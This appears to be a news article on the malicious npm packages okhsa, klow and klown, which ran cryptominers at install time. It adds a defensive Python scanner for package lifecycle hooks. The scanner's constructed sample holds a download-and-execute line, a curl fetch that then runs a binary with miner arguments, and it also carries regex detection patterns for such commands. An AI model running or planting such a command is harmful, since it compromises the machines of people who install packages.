The bad actor’s NPM account was deactivated, and the three libraries – okhsa, klow, and klown – were removed from the repository on October 15, 2021. The libraries were downloaded 112, 4, and 65 times respectively. “Klow” and “klown” have been tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.
The malicious behaviour was triggered at install time by a script that ran a .bat file (on Windows) or a .sh file (on Unix-based operating systems):
“Packages ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on if the user is running Windows or a Unix-based operating system.”
“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.
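The download-and-execute chain described in the quote above (an install-time hook branching on the host OS, handing off to a .bat or .sh script, fetching a native binary and running it) is something a practitioner can screen for before a package reaches `npm install`. The following Python is an added example and not Sonatype's tooling or anything from the packages discussed: it walks the lifecycle hooks of an unpacked package, follows hand-offs to script files shipped alongside package.json, and reports which indicators cluster under each hook. The two sample packages, the file names, the RFC 5737 address 203.0.113.10 and the miner-style arguments are all constructed for the example and do not reproduce the real klow/klown contents.

```python
import json
import re

# Lifecycle hooks that npm runs automatically on install or uninstall.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preuninstall", "postuninstall", "prepare")

# Indicators of the staged pattern described in the article: branch on the host
# OS, hand off to a .bat or .sh script, fetch a remote binary, run it.
INDICATORS = [
    (re.compile(r"\.(bat|cmd)\b"), "invokes a Windows batch script"),
    (re.compile(r"\.sh\b"), "invokes a Unix shell script"),
    (re.compile(r"\b(curl|wget)\b|https?://"), "fetches remote content"),
    (re.compile(r"child_process|execSync|spawnSync"), "spawns a subprocess from node"),
    (re.compile(r"process\.platform|os\.platform\(\)|\buname\b"), "branches on the host OS"),
    (re.compile(r"chmod\s+\+x|\.exe\b|--threads"), "runs a native binary, here with miner-style arguments"),
]

# A file name ending in .js/.sh/.bat/.cmd mentioned inside a hook command or script.
REFERENCED_FILE = re.compile(r"[\w./-]+\.(?:js|sh|bat|cmd)\b")


def audit_package(files):
    """Audit an unpacked package given as {relative_path: text}.

    Starting from each lifecycle hook in package.json, scan the hook command and
    every script file it references (transitively) for the indicators above.
    Returns a sorted list of (hook, location, reason) findings.
    """
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts") or {}
    findings = set()
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        worklist = [("package.json", cmd)]
        seen = set()
        while worklist:
            location, text = worklist.pop()
            if location in seen:
                continue
            seen.add(location)
            for pattern, reason in INDICATORS:
                if pattern.search(text):
                    findings.add((hook, location, reason))
            # Follow hand-offs to other script files shipped in the package.
            for ref in REFERENCED_FILE.findall(text):
                path = ref.lstrip("./")
                if path in files:
                    worklist.append((path, files[path]))
    return sorted(findings)


def is_suspicious(files, threshold=2):
    """Flag a package when several distinct indicators cluster under one hook;
    a single hit (a prepare hook that runs a build script) is normal."""
    per_hook = {}
    for hook, _location, reason in audit_package(files):
        per_hook.setdefault(hook, set()).add(reason)
    return any(len(reasons) >= threshold for reasons in per_hook.values())


# Constructed sample packages for the example (not the real klow/klown contents).
BENIGN_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-lib", "version": "1.0.0",
        "scripts": {"test": "node test.js", "prepare": "node build.js"},
    }),
    "build.js": "console.log('building example-lib');\n",
}

SUSPICIOUS_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-pkg", "version": "1.0.0",
        "scripts": {"preinstall": "node preinstall.js"},
    }),
    "preinstall.js": (
        "const { execSync } = require('child_process');\n"
        "if (process.platform === 'win32') {\n"
        "  execSync('run.bat');\n"
        "} else {\n"
        "  execSync('sh run.sh');\n"
        "}\n"
    ),
    # 203.0.113.10 is an RFC 5737 documentation address; the arguments are illustrative.
    "run.sh": (
        "curl -sO http://203.0.113.10/payload && chmod +x payload && "
        "./payload -o pool.example:3333 --threads 4\n"
    ),
}

if __name__ == "__main__":
    for name, pkg in (("benign", BENIGN_PACKAGE), ("suspicious", SUSPICIOUS_PACKAGE)):
        print(name, is_suspicious(pkg), audit_package(pkg))
```

Two caveats apply. The indicators are plain-text heuristics, so a hook that unpacks a base64 or hex blob before executing it will not match and should be treated as its own red flag. And the check only matters if hooks actually run: `npm install --ignore-scripts`, or `npm config set ignore-scripts true` in a CI image, prevents preinstall and postinstall scripts from executing at all, which is the simplest control against this class of package.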
This isn’t the first time that malicious packages have been found in the npm registry: brandjacking, typosquatting, and cryptomining malware have all been spotted there before.
In June, security researchers from Sonatype and JFrog discovered packages on the PyPI repository that secretly deployed crypto-miners on affected machines. The packages were named after repositories or components from high-profile tech companies to perform what is known as dependency confusion attacks.